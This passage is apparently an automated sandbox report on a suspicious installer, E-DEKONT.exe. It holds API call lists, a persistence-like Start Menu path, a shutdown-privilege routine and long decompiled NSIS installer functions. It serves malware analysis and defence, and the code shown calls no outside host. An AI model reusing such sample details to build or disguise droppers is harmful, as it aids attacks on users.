                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403845
                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403868
                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 0040388D
                                                                            • ExitProcess.KERNEL32 ref: 004038B0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                            • String ID: "C:\Users\user\Desktop\E-DEKONT.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede$C:\Users\user\Desktop$C:\Users\user\Desktop\E-DEKONT.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 96%
                                                                            			E00404C62(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                            				struct HWND__* _v8;
                                                                            				struct HWND__* _v12;
                                                                            				signed int _v16;
                                                                            				signed int _v20;
                                                                            				intOrPtr _v24;
                                                                            				signed char* _v28;
                                                                            				long _v32;
                                                                            				signed int _v40;
                                                                            				int _v44;
                                                                            				signed int* _v56;
                                                                            				signed char* _v60;
                                                                            				signed int _v64;
                                                                            				long _v68;
                                                                            				void* _v72;
                                                                            				intOrPtr _v76;
                                                                            				intOrPtr _v80;
                                                                            				void* _v84;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				signed int _t192;
                                                                            				intOrPtr _t195;
                                                                            				long _t201;
                                                                            				signed int _t205;
                                                                            				signed int _t216;
                                                                            				void* _t219;
                                                                            				void* _t220;
                                                                            				int _t226;
                                                                            				signed int _t231;
                                                                            				signed int _t232;
                                                                            				signed int _t233;
                                                                            				signed int _t239;
                                                                            				signed int _t241;
                                                                            				signed char _t242;
                                                                            				signed char _t248;
                                                                            				void* _t252;
                                                                            				void* _t254;
                                                                            				signed char* _t270;
                                                                            				signed char _t271;
                                                                            				long _t273;
                                                                            				long _t276;
                                                                            				int _t282;
                                                                            				signed int _t283;
                                                                            				long _t284;
                                                                            				signed int _t287;
                                                                            				signed int _t294;
                                                                            				signed char* _t302;
                                                                            				struct HWND__* _t306;
                                                                            				int _t307;
                                                                            				signed int* _t308;
                                                                            				int _t309;
                                                                            				long _t310;
                                                                            				signed int _t311;
                                                                            				void* _t313;
                                                                            				long _t314;
                                                                            				int _t315;
                                                                            				signed int _t316;
                                                                            				void* _t318;
                                                                            
                                                                            				_t306 = _a4;
                                                                            				_v12 = GetDlgItem(_t306, 0x3f9);
                                                                            				_v8 = GetDlgItem(_t306, 0x408);
                                                                            				_t318 = SendMessageW;
                                                                            				_v20 =  *0x434f28;
                                                                            				_t282 = 0;
                                                                            				_v24 =  *0x434ef4 + 0x94;
                                                                            				if(_a8 != 0x110) {
                                                                            					L23:
                                                                            					if(_a8 != 0x405) {
                                                                            						_t285 = _a16;
                                                                            					} else {
                                                                            						_a12 = _t282;
                                                                            						_t285 = 1;
                                                                            						_a8 = 0x40f;
                                                                            						_a16 = 1;
                                                                            					}
                                                                            					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                            						_v16 = _t285;
                                                                            						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
                                                                            							if(( *0x434efd & 0x00000002) != 0) {
                                                                            								L41:
                                                                            								if(_v16 != _t282) {
                                                                            									_t231 = _v16;
                                                                            									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
                                                                            										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c)); // executed
                                                                            									}
                                                                            									_t232 = _v16;
                                                                            									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
                                                                            										_t285 = _v20;
                                                                            										_t233 =  *(_t232 + 0x5c);
                                                                            										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
                                                                            											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
                                                                            										} else {
                                                                            											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            								goto L48;
                                                                            							}
                                                                            							if(_a8 == 0x413) {
                                                                            								L33:
                                                                            								_t285 = 0 | _a8 != 0x00000413;
                                                                            								_t239 = E00404BB0(_v8, _a8 != 0x413);
                                                                            								_t311 = _t239;
                                                                            								if(_t311 >= _t282) {
                                                                            									_t88 = _v20 + 8; // 0x8
                                                                            									_t285 = _t239 * 0x818 + _t88;
                                                                            									_t241 =  *_t285;
                                                                            									if((_t241 & 0x00000010) == 0) {
                                                                            										if((_t241 & 0x00000040) == 0) {
                                                                            											_t242 = _t241 ^ 0x00000001;
                                                                            										} else {
                                                                            											_t248 = _t241 ^ 0x00000080;
                                                                            											if(_t248 >= 0) {
                                                                            												_t242 = _t248 & 0x000000fe;
                                                                            											} else {
                                                                            												_t242 = _t248 | 0x00000001;
                                                                            											}
                                                                            										}
                                                                            										 *_t285 = _t242;
                                                                            										E0040117D(_t311);
                                                                            										_a12 = _t311 + 1;
                                                                            										_a16 =  !( *0x434efc) >> 0x00000008 & 0x00000001;
                                                                            										_a8 = 0x40f;
                                                                            									}
                                                                            								}
                                                                            								goto L41;
                                                                            							}
                                                                            							_t285 = _a16;
                                                                            							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                            								goto L41;
                                                                            							}
                                                                            							goto L33;
                                                                            						} else {
                                                                            							goto L48;
                                                                            						}
                                                                            					} else {
                                                                            						L48:
                                                                            						if(_a8 != 0x111) {
                                                                            							L56:
                                                                            							if(_a8 == 0x200) {
                                                                            								SendMessageW(_v8, 0x200, _t282, _t282);
                                                                            							}
                                                                            							if(_a8 == 0x40b) {
                                                                            								_t219 =  *0x42d22c;
                                                                            								if(_t219 != _t282) {
                                                                            									ImageList_Destroy(_t219);
                                                                            								}
                                                                            								_t220 =  *0x42d240;
                                                                            								if(_t220 != _t282) {
                                                                            									GlobalFree(_t220);
                                                                            								}
                                                                            								 *0x42d22c = _t282;
                                                                            								 *0x42d240 = _t282;
                                                                            								 *0x434f60 = _t282;
                                                                            							}
                                                                            							if(_a8 != 0x40f) {
                                                                            								L88:
                                                                            								if(_a8 == 0x420 && ( *0x434efd & 0x00000001) != 0) {
                                                                            									_t307 = (0 | _a16 == 0x00000020) << 3;
                                                                            									ShowWindow(_v8, _t307);
                                                                            									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
                                                                            								}
                                                                            								goto L91;
                                                                            							} else {
                                                                            								E004011EF(_t285, _t282, _t282);
                                                                            								_t192 = _a12;
                                                                            								if(_t192 != _t282) {
                                                                            									if(_t192 != 0xffffffff) {
                                                                            										_t192 = _t192 - 1;
                                                                            									}
                                                                            									_push(_t192);
                                                                            									_push(8);
                                                                            									E00404C30();
                                                                            								}
                                                                            								if(_a16 == _t282) {
                                                                            									L75:
                                                                            									E004011EF(_t285, _t282, _t282);
                                                                            									_v32 =  *0x42d240;
                                                                            									_t195 =  *0x434f28;
                                                                            									_v60 = 0xf030;
                                                                            									_v20 = _t282;
                                                                            									if( *0x434f2c <= _t282) {
                                                                            										L86:
                                                                            										InvalidateRect(_v8, _t282, 1);
                                                                            										if( *((intOrPtr*)( *0x433ebc + 0x10)) != _t282) {
                                                                            											E00404B6B(0x3ff, 0xfffffffb, E00404B83(5));
                                                                            										}
                                                                            										goto L88;
                                                                            									}
                                                                            									_t308 = _t195 + 8;
                                                                            									do {
                                                                            										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
                                                                            										if(_t201 != _t282) {
                                                                            											_t287 =  *_t308;
                                                                            											_v68 = _t201;
                                                                            											_v72 = 8;
                                                                            											if((_t287 & 0x00000001) != 0) {
                                                                            												_v72 = 9;
                                                                            												_v56 =  &(_t308[4]);
                                                                            												_t308[0] = _t308[0] & 0x000000fe;
                                                                            											}
                                                                            											if((_t287 & 0x00000040) == 0) {
                                                                            												_t205 = (_t287 & 0x00000001) + 1;
                                                                            												if((_t287 & 0x00000010) != 0) {
                                                                            													_t205 = _t205 + 3;
                                                                            												}
                                                                            											} else {
                                                                            												_t205 = 3;
                                                                            											}
                                                                            											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
                                                                            											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                                            											SendMessageW(_v8, 0x113f, _t282,  &_v72);
                                                                            										}
                                                                            										_v20 = _v20 + 1;
                                                                            										_t308 =  &(_t308[0x206]);
                                                                            									} while (_v20 <  *0x434f2c);
                                                                            									goto L86;
                                                                            								} else {
                                                                            									_t309 = E004012E2( *0x42d240);
                                                                            									E00401299(_t309);
                                                                            									_t216 = 0;
                                                                            									_t285 = 0;
                                                                            									if(_t309 <= _t282) {
                                                                            										L74:
                                                                            										SendMessageW(_v12, 0x14e, _t285, _t282);
                                                                            										_a16 = _t309;
                                                                            										_a8 = 0x420;
                                                                            										goto L75;
                                                                            									} else {
                                                                            										goto L71;
                                                                            									}
                                                                            									do {
                                                                            										L71:
                                                                            										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
                                                                            											_t285 = _t285 + 1;
                                                                            										}
                                                                            										_t216 = _t216 + 1;
                                                                            									} while (_t216 < _t309);
                                                                            									goto L74;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                            							goto L91;
                                                                            						} else {
                                                                            							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
                                                                            							if(_t226 == 0xffffffff) {
                                                                            								goto L91;
                                                                            							}
                                                                            							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
                                                                            							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
                                                                            								_t310 = 0x20;
                                                                            							}
                                                                            							E00401299(_t310);
                                                                            							SendMessageW(_a4, 0x420, _t282, _t310);
                                                                            							_a12 = _a12 | 0xffffffff;
                                                                            							_a16 = _t282;
                                                                            							_a8 = 0x40f;
                                                                            							goto L56;
                                                                            						}
                                                                            					}
                                                                            				} else {
                                                                            					_v32 = 0;
                                                                            					_v16 = 2;
                                                                            					 *0x434f60 = _t306;
                                                                            					 *0x42d240 = GlobalAlloc(0x40,  *0x434f2c << 2);
                                                                            					_t252 = LoadBitmapW( *0x434ee0, 0x6e);
                                                                            					 *0x42d234 =  *0x42d234 | 0xffffffff;
                                                                            					_t313 = _t252;
                                                                            					 *0x42d23c = SetWindowLongW(_v8, 0xfffffffc, E0040525A);
                                                                            					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                            					 *0x42d22c = _t254;
                                                                            					ImageList_AddMasked(_t254, _t313, 0xff00ff);
                                                                            					SendMessageW(_v8, 0x1109, 2,  *0x42d22c);
                                                                            					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                                            						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                                            					}
                                                                            					DeleteObject(_t313);
                                                                            					_t314 = 0;
                                                                            					do {
                                                                            						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
                                                                            						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
                                                                            							if(_t314 != 0x20) {
                                                                            								_v16 = _t282;
                                                                            							}
                                                                            							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E004062A4(_t282, _t314, _t318, _t282, _t260)), _t314);
                                                                            						}
                                                                            						_t314 = _t314 + 1;
                                                                            					} while (_t314 < 0x21);
                                                                            					_t315 = _a16;
                                                                            					_t283 = _v16;
                                                                            					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
                                                                            					_push(0x15);
                                                                            					E00404217(_a4);
                                                                            					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
                                                                            					_push(0x16);
                                                                            					E00404217(_a4);
                                                                            					_t316 = 0;
                                                                            					_t284 = 0;
                                                                            					if( *0x434f2c <= 0) {
                                                                            						L19:
                                                                            						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                                            						goto L20;
                                                                            					} else {
                                                                            						_t302 = _v20 + 8;
                                                                            						_v28 = _t302;
                                                                            						do {
                                                                            							_t270 =  &(_t302[0x10]);
                                                                            							if( *_t270 != 0) {
                                                                            								_v60 = _t270;
                                                                            								_t271 =  *_t302;
                                                                            								_t294 = 0x20;
                                                                            								_v84 = _t284;
                                                                            								_v80 = 0xffff0002;
                                                                            								_v76 = 0xd;
                                                                            								_v64 = _t294;
                                                                            								_v40 = _t316;
                                                                            								_v68 = _t271 & _t294;
                                                                            								if((_t271 & 0x00000002) == 0) {
                                                                            									if((_t271 & 0x00000004) == 0) {
                                                                            										_t273 = SendMessageW(_v8, 0x1132, 0,  &_v84); // executed
                                                                            										 *( *0x42d240 + _t316 * 4) = _t273;
                                                                            									} else {
                                                                            										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
                                                                            									}
                                                                            								} else {
                                                                            									_v76 = 0x4d;
                                                                            									_v44 = 1;
                                                                            									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
                                                                            									_v32 = 1;
                                                                            									 *( *0x42d240 + _t316 * 4) = _t276;
                                                                            									_t284 =  *( *0x42d240 + _t316 * 4);
                                                                            								}
                                                                            							}
                                                                            							_t316 = _t316 + 1;
                                                                            							_t302 =  &(_v28[0x818]);
                                                                            							_v28 = _t302;
                                                                            						} while (_t316 <  *0x434f2c);
                                                                            						if(_v32 != 0) {
                                                                            							L20:
                                                                            							if(_v16 != 0) {
                                                                            								E0040424C(_v8);
                                                                            								_t282 = 0;
                                                                            								goto L23;
                                                                            							} else {
                                                                            								ShowWindow(_v12, 5);
                                                                            								E0040424C(_v12);
                                                                            								L91:
                                                                            								return E0040427E(_a8, _a12, _a16);
                                                                            							}
                                                                            						}
                                                                            						goto L19;
                                                                            					}
                                                                            				}
                                                                            			}





























































                                                                            0x00404e64
                                                                            0x00404e6c
                                                                            0x00404e45
                                                                            0x00404e52
                                                                            0x00404e52
                                                                            0x00404e09
                                                                            0x00404e0c
                                                                            0x00404e1b
                                                                            0x00404e25
                                                                            0x00404e2d
                                                                            0x00404e34
                                                                            0x00404e3c
                                                                            0x00404e3c
                                                                            0x00404e07
                                                                            0x00404e72
                                                                            0x00404e73
                                                                            0x00404e7f
                                                                            0x00404e7f
                                                                            0x00404e8c
                                                                            0x00404ea7
                                                                            0x00404eab
                                                                            0x00404ec8
                                                                            0x00404ecd
                                                                            0x00000000
                                                                            0x00404ead
                                                                            0x00404eb2
                                                                            0x00404ebb
                                                                            0x00405245
                                                                            0x00405257
                                                                            0x00405257
                                                                            0x00404eab
                                                                            0x00000000
                                                                            0x00404e8c
                                                                            0x00404dc3

                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404C7A
                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404C85
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCF
                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404CE2
                                                                            • SetWindowLongW.USER32(?,000000FC,0040525A), ref: 00404CFB
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0F
                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D21
                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404D37
                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D43
                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D55
                                                                            • DeleteObject.GDI32(00000000), ref: 00404D58
                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D83
                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8F
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E25
                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E50
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E64
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404E93
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA1
                                                                            • ShowWindow.USER32(?,00000005), ref: 00404EB2
                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAF
                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405014
                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405029
                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040504D
                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040506D
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00405082
                                                                            • GlobalFree.KERNEL32(?), ref: 00405092
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040510B
                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 004051B4
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C3
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E3
                                                                            • ShowWindow.USER32(?,00000000), ref: 00405231
                                                                            • GetDlgItem.USER32(?,000003FE), ref: 0040523C
                                                                            • ShowWindow.USER32(00000000), ref: 00405243
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                            • String ID: $M$N
                                                                            • API String ID: 1638840714-813528018
                                                                            • Opcode ID: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
                                                                            • Instruction ID: ace54df752983209bd77257c2b819bbd2f8b8ae60686516a6448f39b7f2ae2b0
                                                                            • Opcode Fuzzy Hash: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
                                                                            • Instruction Fuzzy Hash: E50270B0900209EFDB109FA4DD85AAE7BB5FB84314F10817AF650BA2E1D7799D42CF58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 95%
                                                                            			E10001B18() {
                                                                            				signed int _v8;
                                                                            				signed int _v12;
                                                                            				signed int _v16;
                                                                            				signed int _v20;
                                                                            				WCHAR* _v24;
                                                                            				WCHAR* _v28;
                                                                            				signed int _v32;
                                                                            				signed int _v36;
                                                                            				signed int _v40;
                                                                            				WCHAR* _v44;
                                                                            				signed int _v48;
                                                                            				void* _v52;
                                                                            				intOrPtr _v56;
                                                                            				WCHAR* _t199;
                                                                            				signed int _t202;
                                                                            				void* _t204;
                                                                            				void* _t206;
                                                                            				WCHAR* _t208;
                                                                            				void* _t216;
                                                                            				struct HINSTANCE__* _t217;
                                                                            				struct HINSTANCE__* _t218;
                                                                            				struct HINSTANCE__* _t220;
                                                                            				signed short _t222;
                                                                            				struct HINSTANCE__* _t225;
                                                                            				struct HINSTANCE__* _t227;
                                                                            				void* _t228;
                                                                            				intOrPtr* _t229;
                                                                            				void* _t240;
                                                                            				signed char _t241;
                                                                            				signed int _t242;
                                                                            				void* _t246;
                                                                            				struct HINSTANCE__* _t248;
                                                                            				void* _t249;
                                                                            				signed int _t251;
                                                                            				short* _t253;
                                                                            				signed int _t259;
                                                                            				void* _t260;
                                                                            				signed int _t263;
                                                                            				signed int _t266;
                                                                            				signed int _t267;
                                                                            				signed int _t272;
                                                                            				signed int _t273;
                                                                            				signed int _t274;
                                                                            				signed int _t275;
                                                                            				void* _t278;
                                                                            				void* _t282;
                                                                            				struct HINSTANCE__* _t284;
                                                                            				signed int _t287;
                                                                            				void _t288;
                                                                            				signed int _t289;
                                                                            				signed int _t301;
                                                                            				signed int _t302;
                                                                            				signed short _t308;
                                                                            				signed int _t309;
                                                                            				WCHAR* _t310;
                                                                            				WCHAR* _t312;
                                                                            				WCHAR* _t313;
                                                                            				struct HINSTANCE__* _t314;
                                                                            				void* _t316;
                                                                            				signed int _t318;
                                                                            				void* _t319;
                                                                            
                                                                            				_t284 = 0;
                                                                            				_v32 = 0;
                                                                            				_v36 = 0;
                                                                            				_v16 = 0;
                                                                            				_v8 = 0;
                                                                            				_v40 = 0;
                                                                            				_t319 = 0;
                                                                            				_v48 = 0;
                                                                            				_t199 = E1000121B();
                                                                            				_v24 = _t199;
                                                                            				_v28 = _t199;
                                                                            				_v44 = E1000121B();
                                                                            				_t309 = E10001243();
                                                                            				_v52 = _t309;
                                                                            				_v12 = _t309;
                                                                            				while(1) {
                                                                            					_t202 = _v32;
                                                                            					_v56 = _t202;
                                                                            					if(_t202 != _t284 && _t319 == _t284) {
                                                                            						break;
                                                                            					}
                                                                            					_t308 =  *_t309;
                                                                            					_t287 = _t308 & 0x0000ffff;
                                                                            					_t204 = _t287 - _t284;
                                                                            					if(_t204 == 0) {
                                                                            						_t33 =  &_v32;
                                                                            						 *_t33 = _v32 | 0xffffffff;
                                                                            						__eflags =  *_t33;
                                                                            						L17:
                                                                            						_t206 = _v56 - _t284;
                                                                            						if(_t206 == 0) {
                                                                            							__eflags = _t319 - _t284;
                                                                            							 *_v28 = _t284;
                                                                            							if(_t319 == _t284) {
                                                                            								_t246 = GlobalAlloc(0x40, 0x1ca4); // executed
                                                                            								_t319 = _t246;
                                                                            								 *(_t319 + 0x1010) = _t284;
                                                                            								 *(_t319 + 0x1014) = _t284;
                                                                            							}
                                                                            							_t288 = _v36;
                                                                            							_t43 = _t319 + 8; // 0x8
                                                                            							_t208 = _t43;
                                                                            							_t44 = _t319 + 0x808; // 0x808
                                                                            							_t310 = _t44;
                                                                            							 *_t319 = _t288;
                                                                            							_t289 = _t288 - _t284;
                                                                            							__eflags = _t289;
                                                                            							 *_t208 = _t284;
                                                                            							 *_t310 = _t284;
                                                                            							 *(_t319 + 0x1008) = _t284;
                                                                            							 *(_t319 + 0x100c) = _t284;
                                                                            							 *(_t319 + 4) = _t284;
                                                                            							if(_t289 == 0) {
                                                                            								__eflags = _v28 - _v24;
                                                                            								if(_v28 == _v24) {
                                                                            									goto L39;
                                                                            								}
                                                                            								_t316 = 0;
                                                                            								GlobalFree(_t319);
                                                                            								_t319 = E10001311(_v24);
                                                                            								__eflags = _t319 - _t284;
                                                                            								if(_t319 == _t284) {
                                                                            									goto L39;
                                                                            								} else {
                                                                            									goto L32;
                                                                            								}
                                                                            								while(1) {
                                                                            									L32:
                                                                            									_t240 =  *(_t319 + 0x1ca0);
                                                                            									__eflags = _t240 - _t284;
                                                                            									if(_t240 == _t284) {
                                                                            										break;
                                                                            									}
                                                                            									_t316 = _t319;
                                                                            									_t319 = _t240;
                                                                            									__eflags = _t319 - _t284;
                                                                            									if(_t319 != _t284) {
                                                                            										continue;
                                                                            									}
                                                                            									break;
                                                                            								}
                                                                            								__eflags = _t316 - _t284;
                                                                            								if(_t316 != _t284) {
                                                                            									 *(_t316 + 0x1ca0) = _t284;
                                                                            								}
                                                                            								_t241 =  *(_t319 + 0x1010);
                                                                            								__eflags = _t241 & 0x00000008;
                                                                            								if((_t241 & 0x00000008) == 0) {
                                                                            									_t242 = _t241 | 0x00000002;
                                                                            									__eflags = _t242;
                                                                            									 *(_t319 + 0x1010) = _t242;
                                                                            								} else {
                                                                            									_t319 = E1000158F(_t319);
                                                                            									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) & 0xfffffff5;
                                                                            								}
                                                                            								goto L39;
                                                                            							} else {
                                                                            								_t301 = _t289 - 1;
                                                                            								__eflags = _t301;
                                                                            								if(_t301 == 0) {
                                                                            									L28:
                                                                            									lstrcpyW(_t208, _v44);
                                                                            									L29:
                                                                            									lstrcpyW(_t310, _v24);
                                                                            									L39:
                                                                            									_v12 = _v12 + 2;
                                                                            									_v28 = _v24;
                                                                            									L63:
                                                                            									if(_v32 != 0xffffffff) {
                                                                            										_t309 = _v12;
                                                                            										continue;
                                                                            									}
                                                                            									break;
                                                                            								}
                                                                            								_t302 = _t301 - 1;
                                                                            								__eflags = _t302;
                                                                            								if(_t302 == 0) {
                                                                            									goto L29;
                                                                            								}
                                                                            								__eflags = _t302 != 1;
                                                                            								if(_t302 != 1) {
                                                                            									goto L39;
                                                                            								}
                                                                            								goto L28;
                                                                            							}
                                                                            						}
                                                                            						if(_t206 != 1) {
                                                                            							goto L39;
                                                                            						}
                                                                            						_t248 = _v16;
                                                                            						if(_v40 == _t284) {
                                                                            							_t248 = _t248 - 1;
                                                                            						}
                                                                            						 *(_t319 + 0x1014) = _t248;
                                                                            						goto L39;
                                                                            					}
                                                                            					_t249 = _t204 - 0x23;
                                                                            					if(_t249 == 0) {
                                                                            						__eflags = _t309 - _v52;
                                                                            						if(_t309 <= _v52) {
                                                                            							L15:
                                                                            							_v32 = _t284;
                                                                            							_v36 = _t284;
                                                                            							goto L17;
                                                                            						}
                                                                            						__eflags =  *((short*)(_t309 - 2)) - 0x3a;
                                                                            						if( *((short*)(_t309 - 2)) != 0x3a) {
                                                                            							goto L15;
                                                                            						}
                                                                            						__eflags = _v32 - _t284;
                                                                            						if(_v32 == _t284) {
                                                                            							L40:
                                                                            							_t251 = _v32 - _t284;
                                                                            							__eflags = _t251;
                                                                            							if(_t251 == 0) {
                                                                            								__eflags = _t287 - 0x2a;
                                                                            								if(_t287 == 0x2a) {
                                                                            									_v36 = 2;
                                                                            									L61:
                                                                            									_t309 = _v12;
                                                                            									_v28 = _v24;
                                                                            									_t284 = 0;
                                                                            									__eflags = 0;
                                                                            									L62:
                                                                            									_t318 = _t309 + 2;
                                                                            									__eflags = _t318;
                                                                            									_v12 = _t318;
                                                                            									goto L63;
                                                                            								}
                                                                            								__eflags = _t287 - 0x2d;
                                                                            								if(_t287 == 0x2d) {
                                                                            									L131:
                                                                            									__eflags = _t308 - 0x2d;
                                                                            									if(_t308 != 0x2d) {
                                                                            										L134:
                                                                            										_t253 = _t309 + 2;
                                                                            										__eflags =  *_t253 - 0x3a;
                                                                            										if( *_t253 != 0x3a) {
                                                                            											L141:
                                                                            											_v28 =  &(_v28[0]);
                                                                            											 *_v28 = _t308;
                                                                            											goto L62;
                                                                            										}
                                                                            										__eflags = _t308 - 0x2d;
                                                                            										if(_t308 == 0x2d) {
                                                                            											goto L141;
                                                                            										}
                                                                            										_v36 = 1;
                                                                            										L137:
                                                                            										_v12 = _t253;
                                                                            										__eflags = _v28 - _v24;
                                                                            										if(_v28 <= _v24) {
                                                                            											 *_v44 = _t284;
                                                                            										} else {
                                                                            											 *_v28 = _t284;
                                                                            											lstrcpyW(_v44, _v24);
                                                                            										}
                                                                            										goto L61;
                                                                            									}
                                                                            									_t253 = _t309 + 2;
                                                                            									__eflags =  *_t253 - 0x3e;
                                                                            									if( *_t253 != 0x3e) {
                                                                            										goto L134;
                                                                            									}
                                                                            									_v36 = 3;
                                                                            									goto L137;
                                                                            								}
                                                                            								__eflags = _t287 - 0x3a;
                                                                            								if(_t287 != 0x3a) {
                                                                            									goto L141;
                                                                            								}
                                                                            								goto L131;
                                                                            							}
                                                                            							_t259 = _t251 - 1;
                                                                            							__eflags = _t259;
                                                                            							if(_t259 == 0) {
                                                                            								L74:
                                                                            								_t260 = _t287 - 0x22;
                                                                            								__eflags = _t260 - 0x55;
                                                                            								if(_t260 > 0x55) {
                                                                            									goto L61;
                                                                            								}
                                                                            								switch( *((intOrPtr*)(( *(_t260 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
                                                                            									case 0:
